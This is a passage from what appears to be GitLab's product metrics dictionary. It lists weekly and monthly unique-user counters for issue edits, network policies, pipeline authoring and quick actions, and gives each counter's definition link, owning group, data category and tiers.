definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181418_g_project_management_issue_changed_epic_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_cloned_monthly` + +Count of MAU cloning an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181501_g_project_management_issue_cloned_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_cloned_weekly` + +Count of WAU cloning an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181459_g_project_management_issue_cloned_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_closed_monthly` + +Count of MAU closing an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181326_g_project_management_issue_closed_monthly.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_closed_weekly` + +Count of WAU closing an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181324_g_project_management_issue_closed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_added_monthly` + +Count of MAU commenting on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181446_g_project_management_issue_comment_added_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_added_weekly` + +Count of WAU commenting on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181444_g_project_management_issue_comment_added_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_edited_monthly` + +Count of MAU editing a comment on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181450_g_project_management_issue_comment_edited_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_edited_weekly` + +Count of WAU editing a comment on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181448_g_project_management_issue_comment_edited_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_removed_monthly` + +Count of MAU deleting a comment from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181453_g_project_management_issue_comment_removed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_comment_removed_weekly` + +Count of WAU deleting a comment from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181451_g_project_management_issue_comment_removed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_created_monthly` + +Count of MAU creating new issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181323_g_project_management_issue_created_monthly.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_created_weekly` + +Count of WAU creating issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181321_g_project_management_issue_created_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_cross_referenced_monthly` + +Count of MAU referencing an issue from somewhere else + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181348_g_project_management_issue_cross_referenced_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_cross_referenced_weekly` + +Count of WAU referencing an issue from somewhere else + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181347_g_project_management_issue_cross_referenced_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_description_changed_monthly` + +Count of MAU editing an issue description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181308_g_project_management_issue_description_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_description_changed_weekly` + +Count of WAU editing an issue description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181306_g_project_management_issue_description_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_added_monthly` + +Count of MAU adding a design to an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181424_g_project_management_issue_designs_added_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_added_weekly` + +Count of WAU adding a design to an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181422_g_project_management_issue_designs_added_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_modified_monthly` + +Count of MAU modifying a design on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181427_g_project_management_issue_designs_modified_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_modified_weekly` + +Count of WAU modifying a design on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181425_g_project_management_issue_designs_modified_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_removed_monthly` + +Count of MAU removing a design from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181431_g_project_management_issue_designs_removed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_designs_removed_weekly` + +Count of WAU removing a design from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181429_g_project_management_issue_designs_removed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_due_date_changed_monthly` + +Count of MAU changing an issue due date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181435_g_project_management_issue_due_date_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_due_date_changed_weekly` + +Count of WAU changing an issue due date + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181433_g_project_management_issue_due_date_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_health_status_changed_monthly` + +Count of MAU changing the health status on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181457_g_project_management_issue_health_status_changed_monthly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_health_status_changed_weekly` + +Count of WAU changing the health status on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181455_g_project_management_issue_health_status_changed_weekly.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_iteration_changed_monthly` + +Count of MAU changing an issue's iteration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181341_g_project_management_issue_iteration_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_iteration_changed_weekly` + +Count of WAU changing an issue's iteration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181339_g_project_management_issue_iteration_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_label_changed_monthly` + +Count of MAU changing an issue's label + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181334_g_project_management_issue_label_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_label_changed_weekly` + +Count of WAU changing an issue's label + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181332_g_project_management_issue_label_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_locked_monthly` + +Count of MAU locking an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181407_g_project_management_issue_locked_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_locked_weekly` + +Count of WAU locking an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181405_g_project_management_issue_locked_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_made_confidential_monthly` + +Count of MAU making an issue confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181315_g_project_management_issue_made_confidential_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_made_confidential_weekly` + +Count of WAU making an issue confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181313_g_project_management_issue_made_confidential_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_made_visible_monthly` + +Count of MAU making an issue not confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181319_g_project_management_issue_made_visible_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_made_visible_weekly` + +Count of WAU making an issue not confidential + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181317_g_project_management_issue_made_visible_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_marked_as_duplicate_monthly` + +Count of MAU marking an issue as a duplicate + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181403_g_project_management_issue_marked_as_duplicate_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_marked_as_duplicate_weekly` + +Count of WAU marking an issue as a duplicate + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181401_g_project_management_issue_marked_as_duplicate_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_milestone_changed_monthly` + +Count of MAU changing an issue's milestone + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181337_g_project_management_issue_milestone_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_milestone_changed_weekly` + +Count of WAU changing an issue's milestone + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181336_g_project_management_issue_milestone_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_moved_monthly` + +Count of MAU moving an issue to another project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181352_g_project_management_issue_moved_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_moved_weekly` + +Count of WAU moving an issue to another project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181350_g_project_management_issue_moved_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_related_monthly` + +Count of MAU relating an issue to another issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181356_g_project_management_issue_related_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_related_weekly` + +Count of WAU relating an issue to another issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181354_g_project_management_issue_related_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_removed_from_epic_monthly` + +Count of MAU removing an issue from an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181416_g_project_management_issue_removed_from_epic_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_removed_from_epic_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184221_g_project_management_issue_removed_from_epic_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.issues_edit.g_project_management_issue_reopened_monthly` + +Count of MAU re-opening a closed issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181330_g_project_management_issue_reopened_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_reopened_weekly` + +Count of WAU re-opening a closed issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181328_g_project_management_issue_reopened_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_time_estimate_changed_monthly` + +Count of MAU changing an issue time estimate + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181438_g_project_management_issue_time_estimate_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_time_estimate_changed_weekly` + +Count of WAU changing an issue time estimate + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181437_g_project_management_issue_time_estimate_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_time_spent_changed_monthly` + +Count of MAU recording time spent on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181442_g_project_management_issue_time_spent_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_time_spent_changed_weekly` + +Count of WAU recording time spent on an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181440_g_project_management_issue_time_spent_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_title_changed_monthly` + +Count of MAU editing an issue title + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181304_g_project_management_issue_title_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_title_changed_weekly` + +Count of WAU editing an issue title + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210201124931_g_project_management_issue_title_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_unlocked_monthly` + +Count of MAU unlocking an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181411_g_project_management_issue_unlocked_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_unlocked_weekly` + +Count of WAU unlocking an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181409_g_project_management_issue_unlocked_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_unrelated_monthly` + +Count of MAU unrelating an issue to another issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181400_g_project_management_issue_unrelated_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_unrelated_weekly` + +Count of WAU unrelating an issue to another issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181358_g_project_management_issue_unrelated_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_weight_changed_monthly` + +Count of MAU changing an issue's weight + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181345_g_project_management_issue_weight_changed_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.g_project_management_issue_weight_changed_weekly` + +Count of WAU changing an issue's weight + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181343_g_project_management_issue_weight_changed_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.issues_edit_total_unique_counts_monthly` + +Aggregate count of MAU taking an action related to an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181504_issues_edit_total_unique_counts_monthly.yml) + +Group: `group::project management` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.issues_edit.issues_edit_total_unique_counts_weekly` + +Aggregate count of WAU taking an action related to an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181503_issues_edit_total_unique_counts_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.network_policies.clusters_using_network_policies_ui_monthly` + +Monthly number of distinct clusters with network policies using the network policies UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210623202402_clusters_using_network_policies_ui_monthly.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `implemented` + +Tiers: `ultimate` + +### `redis_hll_counters.network_policies.clusters_using_network_policies_ui_weekly` + +Weekly number of distinct clusters with network policies using the network policies UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210623202358_clusters_using_network_policies_ui_weekly.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `implemented` + +Tiers: `ultimate` + +### `redis_hll_counters.pipeline_authoring.o_pipeline_authoring_unique_users_committing_ciconfigfile_monthly` + +Monthly unique user count doing commits which contains the CI config file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184303_o_pipeline_authoring_unique_users_committing_ciconfigfile_monthly.yml) + +Group: `group::pipeline authoring` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.pipeline_authoring.o_pipeline_authoring_unique_users_committing_ciconfigfile_weekly` + +Weekly unique user count doing commits which contains the CI config file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184301_o_pipeline_authoring_unique_users_committing_ciconfigfile_weekly.yml) + +Group: `group::pipeline authoring` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.pipeline_authoring.o_pipeline_authoring_unique_users_pushing_mr_ciconfigfile_monthly` + +Monthly unique user count having merge requests which contains the CI config file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210301144228_o_pipeline_authoring_unique_users_pushing_mr_ciconfigfile_monthly.yml) + +Group: `group::pipeline authoring` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.pipeline_authoring.o_pipeline_authoring_unique_users_pushing_mr_ciconfigfile_weekly` + +Weekly unique user count having merge requests which contains the CI config file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210301144209_o_pipeline_authoring_unique_users_pushing_mr_ciconfigfile_weekly.yml) + +Group: `group::pipeline authoring` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.pipeline_authoring.pipeline_authoring_total_unique_counts_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210427105033_pipeline_authoring_total_unique_counts_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.pipeline_authoring.pipeline_authoring_total_unique_counts_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210427105030_pipeline_authoring_total_unique_counts_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_approve_monthly` + +Count of MAU using the `/approve` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181508_i_quickactions_approve_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_approve_weekly` + +Count of WAU using the `/approve` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181506_i_quickactions_approve_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_multiple_monthly` + +Count of MAU using the `/assign @user1 @user2` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181516_i_quickactions_assign_multiple_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_multiple_weekly` + +Count of WAU using the `/assign @user1 @user2` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181514_i_quickactions_assign_multiple_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_reviewer_monthly` + +Count of MAU using the `/assign_reviewer` or `request_reviewer` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181523_i_quickactions_assign_reviewer_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_reviewer_weekly` + +Count of WAU using the `/assign_reviewer` or `request_reviewer` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181521_i_quickactions_assign_reviewer_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_self_monthly` + +Count of MAU using the `/assign me` quick action to assign self to an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181519_i_quickactions_assign_self_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_self_weekly` + +Count of WAU using the `/assign me` quick action to assign self to an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181517_i_quickactions_assign_self_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_single_monthly` + +Count of MAU using the `/assign @user1` quick action to assign a single individual to an issuable + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181512_i_quickactions_assign_single_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_assign_single_weekly` + +Count of WAU using the `/assign @user1` quick action to assign a single individual to an issuable 